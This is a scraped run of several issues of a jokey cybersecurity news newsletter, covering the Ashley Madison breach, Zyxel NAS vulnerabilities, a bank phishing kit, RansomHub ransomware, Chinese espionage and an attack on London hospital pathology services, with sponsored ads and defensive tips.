Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

The Ashley Madison Hack

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

The Ashley Madison Hack:

When Secrets Weren't Safe ๐Ÿ”“๐Ÿ’ฅ

โ€ฆโ€ฆ

In light of the Netflix documentary, we thought weโ€™d give you the cold, hard ๐Ÿ‘€ facts surrounding the hack that was heard around the globe. So strap on! ๐Ÿ† Ahem, sorry: strap in because itโ€™s be a humpy ๐Ÿ™ˆ BUMPY ride ๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚

So, here goes: In the sultry summer of 2015, the internet was rocked by a scandal so spicy it made tabloid headlines blush. ๐ŸŒถ๏ธ๐ŸŒ The infamous Ashley Madison hack exposed the hidden liaisons of millions of users, turning a private affair into a very public debacle. ๐Ÿ˜ฑ๐Ÿ“‚

For those who might not recall, Ashley Madison was the go-to site for discreet extramarital escapades. Their cheeky slogan, "Life is short. Have an affair," tempted many into a web of clandestine connections. ๐ŸŽ๐Ÿ”— But it turns out, the only thing more seductive than secret trysts was the allure of a juicy scandal.

๐Ÿ‘จโ€๐Ÿ’ป Enter the hackers: a group calling themselves "The Impact Team." These cyber crusaders had a bone to pick with Ashley Madison's parent company, Avid Life Media. They claimed to be exposing the site's dubious practices, including deceptive marketing and failing to delete user data despite charging fees for a "full delete" option. ๐Ÿค‘๐Ÿ’”

On July 19, 2015, The Impact Team delivered an ultimatum: shut down Ashley Madison or face the release of its entire user database. ๐Ÿšจ๐Ÿ—‚๏ธ When the site didnโ€™t comply, the hackers made good on their threat, dumping a treasure trove of data on the dark web. ๐Ÿ’พ๐ŸŒ‘

The fallout was nothing short of catastrophic. ๐ŸŒช๏ธ Millions of email addresses, credit card details, and user profiles were out in the open, exposing everyone from high-profile celebrities to regular folks. ๐Ÿ•ต๏ธโ€โ™‚๏ธ๐Ÿ“‰ Even government officials and corporate executives found their secrets laid bare, leading to resignations, broken marriages, and a slew of lawsuits. โš–๏ธ๐Ÿ’ฃ

But the drama didnโ€™t stop there. The Ashley Madison hack also sparked a wave of phishing attacks, blackmail attempts, and even a few tragic suicides linked to the exposure. ๐Ÿ˜ข๐Ÿ’” It became a cautionary tale about the perils of online privacy and the double-edged sword of digital anonymity. ๐Ÿ›ก๏ธ๐Ÿ’ป

The breach also unveiled some rather amusing tidbits. For instance, it turned out that a significant number of female profiles on the site were either fake or inactive. ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿฆฐ Talk about an affair to rememberโ€”only it was more of an affair with an illusion. The hackersโ€™ claim that most female accounts were bots added another layer of irony to the whole debacle. ๐Ÿคทโ€โ™‚๏ธ๐Ÿค–

In the aftermath, Ashley Madison faced a mountain of criticism and a plummeting user base. ๐Ÿ“‰๐Ÿ’ฅ The company tried to patch things up by enhancing their security measures and rebranding efforts, but the damage was done. They even attempted to regain public trust by hiring a cybersecurity expert to overhaul their defences. ๐Ÿ”’๐Ÿ› ๏ธ Despite these efforts, the shadow of the hack loomed large over the siteโ€™s reputation. ๐Ÿ•ณ๏ธ

The legal repercussions were equally explosive. Class-action lawsuits sprang up like mushrooms after a rainstorm, with users demanding compensation for the breach of their privacy. ๐Ÿ’ธโš–๏ธ In 2017, Ashley Madisonโ€™s parent company agreed to a $11.2 million settlement to placate the plaintiffs. ๐Ÿ›๏ธ๐Ÿ’ต

So, whatโ€™s the moral of this steamy saga? ๐Ÿ˜๐Ÿ” In the digital age, even the most clandestine corners of the internet aren't immune to prying eyes. ๐Ÿ”๐Ÿ•ต๏ธโ€โ™€๏ธ If youโ€™re engaging in some online hanky-panky, remember that your secrets might not be as safe as you think. ๐Ÿ”๐Ÿ’” As the saying goes, "When you dance with the devil, youโ€™re bound to get burned." ๐Ÿ’ƒ๐Ÿ”ฅ

The Ashley Madison hack remains one of the most talked-about breaches in cyber history, serving as a stark reminder that no one is untouchable in the digital world. ๐ŸŒ๐Ÿ”“ Whether youโ€™re a high-profile politician or just an everyday thrill-seeker, the lessons are clear: protect your data, question online promises, and maybeโ€”just maybeโ€”stick to flirting in person. ๐Ÿ˜‰๐Ÿ•ถ๏ธ

So, next time you think about stepping into the world of online escapades, remember the cautionary tale of Ashley Madison. After all, in the world of cybersecurity, a little discretion goes a long way. ๐Ÿ”

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

European Banks Targeted in Phishing Scam

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s got Rishi praying for StArmageddon ๐Ÿ™ƒ๐Ÿ™ƒ๐Ÿ™ƒ

Itโ€™s Friday, folks, which can only mean one thingโ€ฆ Itโ€™s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโ€™s it.

Congrats, the cybercriminals are no matchโ€ฆ for your patch! ๐Ÿฉน๐Ÿฉน๐Ÿฉน

See you in Zyxel ๐Ÿ˜ˆ๐Ÿ”ฅ๐Ÿ’€

๐Ÿšจ Urgent Update: Critical Security Flaws in Zyxel NAS Devices ๐Ÿ“ฑ

Zyxel has released updates to address critical vulnerabilities in two of its end-of-life (EoL) network-attached storage (NAS) devices. Exploiting three of these flaws could allow unauthenticated attackers to execute OS commands and arbitrary code. ๐Ÿ›ก๏ธ

Impacted Models ๐Ÿ’ฅ

  • NAS326 (versions V5.21(AAZF.16)C0 and earlier)

  • NAS542 (versions V5.21(ABAG.13)C0 and earlier)

Resolved in โœ”๏ธ

  • NAS326: Version V5.21(AAZF.17)C0

  • NAS542: Version V5.21(ABAG.14)C0

Key Vulnerabilities ๐Ÿ”‘

  • CVE-2024-29972: Command injection via "remote_help-cgi" allowing OS command execution.

  • CVE-2024-29973: Command injection via 'setCookie' parameter.

  • CVE-2024-29974: Remote code execution via "file_upload-cgi" by uploading a crafted configuration file.

  • CVE-2024-29975: Privilege management flaw in SUID binary enabling local root command execution.

  • CVE-2024-29976: Flaw in 'show_allsessions' command exposing admin session information.

Top Tips ๐Ÿ›ก๏ธ

Update immediately to the latest firmware versions to ensure your devices are protected. Note that two privilege escalation flaws requiring authentication remain unpatched. No evidence suggests these flaws have been exploited in the wild, but updating ensures optimal protection.

Now, on to todayโ€™s hottest cybersecurity news stories:

  • ๐ŸŽฃ Phishing kits bypass MFA to target European banks ๐Ÿฆ

  • ๐Ÿก Work from homers, watch out! Scammers abound! ๐Ÿ‘จโ€๐Ÿ’ป

  • ๐Ÿ‘€ Letโ€™s ChatGPSee about thatโ€ฆ plugin flaws galore ๐Ÿ”Œ

Hackers: Go Phish, MFAs ๐ŸŽฃ๐Ÿ‘€๐Ÿ’€

๐Ÿšจ Cybercriminals Strike Again! European Banks Targeted ๐ŸŽฏ

Cybercriminals are using a new phishing-as-a-service platform called V3B to target European banking clients. Priced between $130 and $450 monthly, this kit enables fraudsters to bypass multi factor authentication (MFA) with ease. Resecurity researchers found V3B has been operational since March 2023, allowing fraudsters to mimic over 50 financial institutions.

๐Ÿ” Advanced Features and Social Engineering

V3B uses social engineering and spoofing to trick victims into revealing sensitive information. It supports real-time interactions, evading MFA through methods like SMS codes, QR Codes, and PhotoTAN, a common second-factor app in Germany and Switzerland. The kit also boasts advanced obfuscation and anti-bot measures, making detection challenging.

๐Ÿ’ฌ Promoted by "Vssrtje"

A threat actor named "Vssrtje" promotes V3B on Telegram and dark web communities, with the associated Telegram channel having over 1,255 members. Hundreds of cybercriminals are estimated to use this kit, leading to significant financial losses for European banks.

๐Ÿ’ณ Interception of Credit Card Data

V3B isn't limited to banks; it also targets credit card data, recently adding support for International Card Services with Dutch templates. The kit's multi country targeting, encrypted code, and live chat with victims make it a formidable tool for fraudsters.

๐ŸŒ European Banks at High Risk

With the European Unionโ€™s substantial economy and mature financial system, phishing attacks like these pose a serious threat, causing considerable financial losses. Stay vigilant and secure your banking information!

Itโ€™s a Work From Homing missile ๐Ÿš€๐Ÿš€๐Ÿš€

๐Ÿšจ Beware of Fake Work-From-Home Job Scams! ๐Ÿก

Scammers are posing as legitimate businesses, like staffing or recruiting agencies, to offer fake work-from-home jobs. These jobs often involve simple tasks, such as rating restaurants or "optimising" services by clicking buttons. The catch? Victims must make cryptocurrency payments to earn more money or unlock tasks, with all payments going straight to the scammers.

๐Ÿ”ด Red Flags to Watch Out For

  • Youโ€™re asked to make cryptocurrency payments to your employer.

  • Job tasks are simple and include terms like "optimization."

  • No references are required during the hiring process.

๐Ÿ›ก๏ธ Top Tips

Be wary of unsolicited job offers and avoid clicking on links, downloading files, or opening attachments in these messages.

  • Never send money to an alleged employer.

  • Do not pay for services claiming to recover lost cryptocurrency funds.

  • Avoid sharing financial or personal information with unsolicited job offers.

๐Ÿ“ข Report It!

If you encounter these scams, report them to the FBI IC3 at www.ic3.gov. Include any transaction information related to the scam. For more details, see prior IC3 PSA Alert Number I-082423-PSA.

Stay safe and protect your financial well-being! ๐Ÿ’ผ๐Ÿ”’

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Stay ahead of the curve with Presspool.ai! ๐Ÿš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐Ÿค“๐Ÿ’ก Thatโ€™s us, alright! ๐Ÿคต How about you? Visionary AI executive, much? ๐Ÿ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿ’ป๐ŸŒ

Rest assured, the process is very straightforward.

You simply:

๐Ÿ†• Sign Up & Create Campaign

๐Ÿ“Š Define your audience, budget, and message to captivate your audience.

๐Ÿš€ Launch your campaign, as Presspoolโ€™s AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ŸŽฏ

๐Ÿ•ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐Ÿ“ˆ Elevate your marketing game and stay informed with Presspool.ai! ๐ŸŒŸ Simples! ๐Ÿฆฆ

Presspool.aiย ๐Ÿ“ฐ๐ŸŠ๐Ÿค– may just have what you need to succeed. And if the product isnโ€™t for you, the newsletter alone is a gamechanger. And we know newsletters ๐Ÿ˜‰

Well, thatโ€™s ChatGPT ๐Ÿคทโ€โ™‚๏ธ๐Ÿคทโ€โ™‚๏ธ๐Ÿคทโ€โ™‚๏ธ

๐Ÿšจ Secure Your Enterprise from ChatGPT Plugin Risks! ๐Ÿ”Œ

ChatGPT is revolutionising businesses with over a thousand third-party plugins available. While these plugins boost productivity, they also introduce significant security challenges. Hereโ€™s what you need to know to stay safe.

โš ๏ธ Top Security Risks with ChatGPT Plugins

Data Privacy & Confidentiality

ChatGPT plugins can expose confidential enterprise information. Ensure sensitive data is protected from unauthorised access by plugin developers or third parties.

Compliance Risks

Using these plugins might breach regulations like GDPR or HIPAA, leading to legal and financial consequences.

Dependency & Reliability

Relying on external plugins for critical operations poses risks, such as service disruptions and unreliable vendor support.

New Security Vulnerabilities

Plugins can introduce new bugs or flaws. For example, a security flaw allowed attackers to intercept and replace approval codes during plugin installation, leading to unauthorised access.

๐Ÿ’ก Mitigation Strategies

Risk Assessments

Regularly conduct risk assessments and monitor plugins for vulnerabilities. Block risky plugins and keep an updated inventory.

Data Privacy Policies

Ensure plugins comply with your companyโ€™s data policies. Exercise data deletion rights for noncompliance.

User Training

Include ChatGPT plugin security in your training programs. Keep sessions brief and impactful to maintain user awareness.

Behavioural Monitoring

Track data usage and access through plugins. Implement policies to identify and control the use of tools like ChatGPT.

Stay Vigilant! ๐Ÿ“ข

While ChatGPT plugins can enhance your business, they come with security risks that need careful management. Adopt a strategic approach to integrate these tools safely into your workflows.

Stay safe and secure! ๐Ÿ’ผ๐Ÿ”’

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

TikTok celebrity accounts targeted

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s trending like #OnlyFans ๐Ÿ†๐Ÿ‘๐Ÿ’ฆ

Todayโ€™s hottest cybersecurity news stories:

  • โฐ TikTok celebrity accounts targeted by zero-click attacks โš”๏ธ

  • โš”๏ธ Knight ransomware 2.0 is hitting up healthcare, business ๐Ÿ‘จโ€๐Ÿ’ป

  • ๐Ÿœ SE Asian governments targeted by Chinese-backed hackers ๐Ÿ‰

โฐ Clock ticks TikTok on zero-click d*cks ๐Ÿ’€

๐Ÿšจ TikTok Faces Zero-Click Security Breach ๐Ÿ”“

TikTok has acknowledged a security flaw exploited by threat actors to hijack high-profile accounts. The breach involves a zero-click takeover, where malware spread via direct messages compromises accounts without user interaction.

๐Ÿ“‰ Scope and Response

The exact number of affected users is unknown. However, TikTok has implemented preventive measures to stop the attack and prevent future occurrences. The company is working with affected users to restore access, asserting that only a "very small" number of accounts were compromised. Details about the attack and mitigation techniques remain undisclosed.

๐Ÿ”’ Past Security Issues

TikTok has faced several security challenges:

January 2021: Check Point identified a flaw enabling attackers to compile user databases and phone numbers.

September 2022: Microsoft discovered a one-click exploit in TikTok's Android app allowing account takeovers via specially crafted links.

Turkey Incident: 700,000 accounts compromised due to insecure SMS greyrouting, allowing adversaries to intercept one-time passwords.

๐Ÿ“ฑ Ongoing Concerns

Malicious actors continue to exploit TikTok, using challenges like the Invisible Challenge to distribute information-stealing malware. TikTokโ€™s Chinese ownership raises concerns about data privacy and propaganda, prompting legislative actions and bans.

๐ŸŒ Global Impact

Legal Actions: TikTok is challenging a U.S. law requiring divestment from ByteDance, citing free speech violations.

Bans: Countries like India, Nepal, and Kyrgyzstan have banned TikTok. The U.S., U.K., Canada, Australia, and New Zealand restrict its use on government devices.

TikTok continues to navigate security vulnerabilities and international scrutiny as it works to secure its platform and user data.

Triggering Knight or flight responses from targeted organisations ๐Ÿ˜ฌ

๐Ÿšจ RansomHub: The Evolution of Knight Ransomware ๐Ÿ›ก๏ธ

RansomHub, a rebranded version of Knight ransomware (formerly Cyclops), has been identified as an updated threat in the cybersecurity landscape. Knight ransomware first appeared in May 2023, using double extortion to steal and encrypt data across multiple platforms, including Windows, Linux, macOS, ESXi, and Android.

๐Ÿ“‰ Distribution and Evolution

Knight ransomware was initially promoted on the RAMP cybercrime forum and spread through phishing and spear-phishing campaigns. In February 2024, its source code was sold, likely leading to its rebranding as RansomHub. The new strain quickly launched attacks on Change Healthcare, Christieโ€™s, and Frontier Communications, among others.

๐Ÿ”’ Shared Characteristics and New Features

Both Knight and RansomHub ransomware are written in Go and use Gobfuscate for obfuscation. They share similar command-line help menus, ransom notes, and encryption techniques. RansomHub introduces a new "sleep" command, allowing the ransomware to remain dormant before execution, a feature seen in other ransomware families like Chaos/Yashma and Trigona.

โš™๏ธ Tactics and Tools

RansomHub uses known security flaws like ZeroLogon to gain initial access, deploying remote desktop software such as Atera and Splashtop before executing ransomware. The strain has been linked to 26 confirmed attacks in April 2024, trailing behind other ransomware groups like Play and Black Basta.

๐Ÿ’ผ Recruitment and Expertise

Google-owned Mandiant reports that RansomHub is recruiting affiliates from recently shut down groups like LockBit and BlackCat. Veteran cybercriminals with extensive experience are believed to be behind RansomHubโ€™s rapid establishment and operations.

๐Ÿ“ˆ Rising Ransomware Activity

Ransomware incidents surged in 2023, with many new variants like BlackSuit, Fog, and ShrinkLocker. One-third of these new families are variants of older ransomware, highlighting code reuse and rebranding trends. Most ransomware deployments occur outside work hours, with 76% happening early in the morning, and attackers increasingly use legitimate tools to evade detection.

๐Ÿš€ Advanced Techniques

ShrinkLocker, another emerging ransomware, uses VBScript and BitLocker for file encryption, targeting countries like Mexico, Indonesia, and Jordan. This strain manipulates partition sizes to create new boot partitions, demonstrating a deep understanding of Windows internals.

RansomHubโ€™s emergence underscores the evolving and persistent threat posed by ransomware, necessitating robust cybersecurity measures and constant vigilance.

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Stay ahead of the curve with Presspool.ai! ๐Ÿš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐Ÿค“๐Ÿ’ก Thatโ€™s us, alright! ๐Ÿคต How about you? Visionary AI executive, much? ๐Ÿ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿ’ป๐ŸŒ

Rest assured, the process is very straightforward.

You simply:

๐Ÿ†• Sign Up & Create Campaign

๐Ÿ“Š Define your audience, budget, and message to captivate your audience.

๐Ÿš€ Launch your campaign, as Presspoolโ€™s AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ŸŽฏ

๐Ÿ•ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐Ÿ“ˆ Elevate your marketing game and stay informed with Presspool.ai! ๐ŸŒŸ Simples! ๐Ÿฆฆ

Presspool.aiย ๐Ÿ“ฐ๐ŸŠ๐Ÿค– may just have what you need to succeed. And if the product isnโ€™t for you, the newsletter alone is a gamechanger. And we know newsletters ๐Ÿ˜‰

Itโ€™s an Asian invasion ๐Ÿ˜ณ

๐Ÿšจ Crimson Palace: Chinese Espionage Targets Southeast Asian Government ๐Ÿ•ต๏ธโ€โ™€๏ธ

A high-profile government organisation in Southeast Asia has been the target of a "complex, long-running" Chinese state-sponsored cyber espionage operation, codenamed Crimson Palace. Sophos researchers detailed this sophisticated campaign aimed at cyberespionage to support Chinese state interests.

๐ŸŒ Suspected Target and Objectives

While the exact country remains undisclosed, it's speculated to be the Philippines due to ongoing territorial conflicts with China. The campaign's goals include maintaining access to critical IT systems, performing reconnaissance on specific users, collecting sensitive military and technical information, and deploying various malware implants for command-and-control (C2) communications.

๐Ÿ”— Intrusion Clusters

Crimson Palace consists of three intrusion clusters with some activities dating back to March 2022:

โ—ย Cluster Alpha (Mar 2023 – Aug 2023): Shares tactics with BackdoorDiplomacy, REF5961, Worok, and TA428.

โ—ย Cluster Bravo (Mar 2023): Commonalities with Unfading Sea Haze.

โ—ย Cluster Charlie (Mar 2023 – Apr 2024): Overlaps with Earth Longzhi, a subgroup within APT41.

Sophos believes these clusters are part of a coordinated campaign directed by a single organisation.

๐Ÿ›ก๏ธ Malware and Techniques

The attack features undocumented malware like PocoProxy and an updated EAGERBEE, alongside known families such as NUPAKAGE, PowHeartBeat, RUDEBIRD, DOWNTOWN (PhantomNet), and EtherealGh0st (CCoreDoor). Notable techniques include DLL side-loading and overwriting DLL in memory to evade detection.

๐Ÿ” Cluster Activities

Cluster Alpha: Focused on mapping server subnets, enumerating admin accounts, and Active Directory reconnaissance.

Cluster Bravo: Used valid accounts for lateral movement and dropped EtherealGh0st.

Cluster Charlie: Used PocoProxy for persistence and HUI Loader to deliver Cobalt Strike.

These clusters reflect the coordinated operations of distinct actors with shared objectives and tools.

โš™๏ธ Chinese Cyber Threats

The disclosure follows reports of APT41 (aka Brass Typhoon, HOODOO, Winnti) targeting Italian organisations with KEYPLUG malware, a potent tool supporting multiple network protocols for C2 traffic.

๐Ÿšจ Global Implications

The Canadian Centre for Cyber Security has warned of increasing Chinese state-backed attacks targeting government, critical infrastructure, and R&D sectors. Chinese cyber threat activity is noted for its volume, sophistication, and broad targeting, utilising techniques like compromised SOHO routers and living-off-the-land tactics to avoid detection.

This detailed analysis of Crimson Palace underscores the persistent and evolving threat of state-sponsored cyber espionage, highlighting the need for robust cybersecurity measures and vigilant monitoring.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

London hospitals hit by ransomware attack

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s the milkshake to Nigel Farrageโ€™s cybercrime ๐Ÿ‘€๐Ÿ™ˆ๐Ÿ˜‚

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿฅ NHS hack attack! London hospitals hit by ransomware attack ๐Ÿ’ฐ

  • ๐Ÿถ Decoy Dog hounds Russian power, IT Firms, and govt agencies ๐Ÿ‘จโ€๐Ÿ’ป

  • ๐ŸŽ‰ Introducing the next generation of RBI (Remote Browser Isolation) ๐Ÿ๏ธ

Hackers: Can we hack it? NHS we canโ€ฆ For shame ๐Ÿ˜ก๐Ÿ˜ก๐Ÿ˜ก

๐Ÿšจ London Hospitals Hit by Major Cyber Attack ๐Ÿ’ฅ

Seven London hospitals, including Guyโ€™s, St Thomasโ€™, and Kingโ€™s College, faced major disruptions after a ransomware attack on Synnovis, a private firm analysing their blood tests. Operations, blood transfusions, and some C-sections had to be cancelled or rescheduled.

๐Ÿฅ Hospitals Affected

  • Guyโ€™s

  • St Thomasโ€™

  • Kingโ€™s College

  • Evelina Childrenโ€™s Hospital

  • Royal Brompton and Harefield

  • Princess Royal Hospital

๐Ÿ”’ Ransomware Attack Details

Hackers locked Synnovisโ€™s IT systems, demanding payment to restore access. This disrupted pathology services, forcing communication via paper and limiting lab functionality.

๐Ÿฉบ Emergency Measures

NHS England enacted โ€œmutual aidโ€ procedures to assist affected hospitals, ensuring some services continued. Despite this, elective operations were moved or cancelled.

๐Ÿ‘จโ€โš•๏ธ Leadership Response

Prof Ian Abbs, GSTTโ€™s chief executive, highlighted the significant impact on services, especially blood transfusions. Synnovis CEO Mark Dollar acknowledged the severity and called the attack a harsh reminder of cybersecurity risks.

โš ๏ธ Ongoing Challenges

Synnovis, along with the National Cyber Security Centre, is working to resolve the issue. This is the third cyber attack on Synnovis's parent company, Synlab, in the past year.

๐Ÿ›ก๏ธ Stay Safe Online! ๐Ÿ’ป

Learn how to scale your GRC program with automation and AI

Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.

  • Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring

  • Centralize risk and report on program impact to internal teams

  • Create your own Trust Center to proactively manage buyer needs

  • Leverage AI to answer security questionnaires faster

Join Vantaโ€™s webinar on June 11 to learn more about scaling your GRC program with automation and AI.

Register to save your spot.

They got that Decoy Dog in them ๐Ÿ’€๐Ÿ’€๐Ÿ’€

๐Ÿšจ Russian Targets Hit by "Decoy Dog" Cyber Attacks ๐Ÿ›ก๏ธ

Russian organisations are under siege from a Windows version of the Decoy Dog malware, according to Positive Technologies. The cyberattack campaign, dubbed Operation Lahat, is attributed to the advanced persistent threat (APT) group HellHounds.

๐Ÿพ HellHounds' Tactics

HellHounds infiltrates selected organisations, gaining long-term, undetected access through vulnerable web services and trusted relationships. First identified in November 2023 after compromising a power company, HellHounds have now targeted 48 Russian entities, including IT firms, government bodies, space industry companies, and telecom providers.

๐Ÿ–ฅ๏ธ Decoy Dog Malware

Decoy Dog, a variant of the open-source Pupy RAT, uses DNS tunnelling for command-and-control (C2) communications, moving victims between controllers to evade detection. Initially known to target Linux systems, a Windows version has now been confirmed. The malware's development dates back to November 2019, with active targeting observed since 2021.

๐Ÿ”‘ Advanced Techniques

The Windows version of Decoy Dog is delivered via a loader that decrypts the payload using dedicated infrastructure. HellHounds also employ a modified version of the 3snake tool to obtain credentials on Linux hosts. In at least two cases, they gained access through compromised Secure Shell (SSH) login credentials.

๐Ÿ” Ongoing Threat

Positive Technologies highlights that HellHounds' toolkit, based on open-source projects, is adeptly modified to bypass malware defences. This allows them to maintain a covert presence within critical Russian organisations, posing a significant and ongoing threat.

RBIโ€™m listening ๐Ÿ™ƒ๐Ÿ™ƒ๐Ÿ™ƒ

๐Ÿšจ Evolution of Browser Security: From Isolation to Secure Extensions ๐Ÿ›ก๏ธ

The latest report, "The Next Generation of RBI (Remote Browser Isolation)," highlights the shift from Browser Isolation, once the gold standard for web security, to advanced Secure Browser Extensions. In today's SaaS-centric world, traditional Browser Isolation methods are no longer sufficient.

๐Ÿ“‰ Limitations of Browser Isolation

Browser Isolation faced challenges like:

Performance Issues: High CPU usage led to slower browsing, impacting productivity.

Inadequate Protection: Ineffective against modern threats like phishing and malicious extensions.

๐Ÿ”’ Emergence of Secure Browser Extensions

Secure Browser Extensions address these issues, providing:

Real-Time Visibility: Continuous monitoring of browsing activities.

Risk Analysis: Identifying and validating malicious actions.

Granular Enforcement: Automatically disabling harmful web components or blocking access.

โš™๏ธ Advanced Features

Seamless Integration: Fits into existing browsers without impacting user experience.

Machine Learning: Analyses web pages in real-time to neutralise threats such as file downloads and credential harvesting.

๐Ÿš€ Key Advantages Over Browser Isolation

Performance: Minimal CPU impact ensures smooth browsing.

Easy Deployment: Centralised deployment on managed devices and simple installation on unmanaged ones, ideal for all workplace types.

To dive deeper, check out the full report on the evolution of browser security and the benefits of Secure Browser Extensions.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Operation Endgame looking for Emotet Mastermind

